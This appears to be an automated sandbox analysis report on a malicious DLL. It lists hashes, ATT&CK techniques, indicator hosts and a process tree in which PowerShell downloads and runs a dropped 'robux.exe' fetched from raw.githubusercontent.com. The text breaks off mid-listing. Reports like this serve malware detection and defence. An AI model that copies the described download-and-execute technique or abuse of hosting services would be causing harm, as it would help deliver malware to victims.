fd563cf7c0c862ab910cf558b5a123354b616e84902d277edf09f378ff6f9786

Resubmissions

19-12-2024 08:32

241219-kfqvbsxmgl 10

19-12-2024 08:29

19-12-2024 08:22

19-12-2024 08:18

19-12-2024 08:10

19-12-2024 07:51

19-12-2024 07:46

19-12-2024 07:46

Analysis

max time kernel
965s
max time network
1050s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-12-2024 07:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b28242123ed2cf6000f0aa036844bd29.dll
Size

87KB
MD5

b28242123ed2cf6000f0aa036844bd29
SHA1

915f41a6c59ed743803ea0ddde08927ffd623586
SHA256

fd563cf7c0c862ab910cf558b5a123354b616e84902d277edf09f378ff6f9786
SHA512

08e5966ca90f08c18c582e6c67d71186a6f9c025fc9f78020e1ce202814de094171111b7f3623d81f7371acdf92206446f7c0425e08e8f5f5b6fd969007d9fca
SSDEEP

1536:0A1KsVHBnVJ0T1rFTQHUPx+nVP7ZSRILMZoXyqqEbzPCAdt6rFTc:0A1rVIrFTOUsnVP7sRILgAPCvrFTc

Score

8^/10

discovery execution motw phishing

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
792	4312	powershell.exe
794	4312	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4312	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1664	robux.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
787	raw.githubusercontent.com
788	raw.githubusercontent.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
303	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1824	1056	WerFault.exe	83

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2948	timeout.exe
4684	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{BF1403BD-1D44-4CCD-BF18-71969844D94F}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe"	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 793680.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3692	msedge.exe
3692	msedge.exe
3120	msedge.exe
3120	msedge.exe
776	identity_helper.exe
776	identity_helper.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
5460	msedge.exe
5460	msedge.exe
1668	msedge.exe
5832	msedge.exe
5832	msedge.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4312	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe
3120	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4752 wrote to memory of 1056	4752	regsvr32.exe	83
PID 4752 wrote to memory of 1056	4752	regsvr32.exe	83
PID 4752 wrote to memory of 1056	4752	regsvr32.exe	83
PID 3120 wrote to memory of 988	3120	msedge.exe	92
PID 3120 wrote to memory of 988	3120	msedge.exe	92
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 2532	3120	msedge.exe	93
PID 3120 wrote to memory of 3692	3120	msedge.exe	94
PID 3120 wrote to memory of 3692	3120	msedge.exe	94
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95
PID 3120 wrote to memory of 2584	3120	msedge.exe	95

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b28242123ed2cf6000f0aa036844bd29.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:4752
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\b28242123ed2cf6000f0aa036844bd29.dll
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1056
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 604
    3⤵
    - Program crash
    PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1056 -ip 1056
1⤵
PID:3148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbe9a146f8,0x7ffbe9a14708,0x7ffbe9a14718
  2⤵
  PID:988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
  2⤵
  PID:2532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
  2⤵
  PID:2584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:4228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
  2⤵
  PID:2884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
  2⤵
  PID:536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7268 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
